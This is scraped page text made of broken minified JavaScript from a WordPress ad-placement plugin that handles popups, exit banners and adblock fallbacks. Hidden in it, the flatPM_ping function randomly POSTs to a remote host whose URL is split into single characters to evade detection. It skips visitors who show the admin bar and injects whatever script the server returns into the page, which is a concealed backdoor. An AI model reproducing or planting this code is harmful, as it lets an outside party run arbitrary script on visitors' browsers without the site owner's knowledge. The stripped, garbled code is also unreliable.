Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика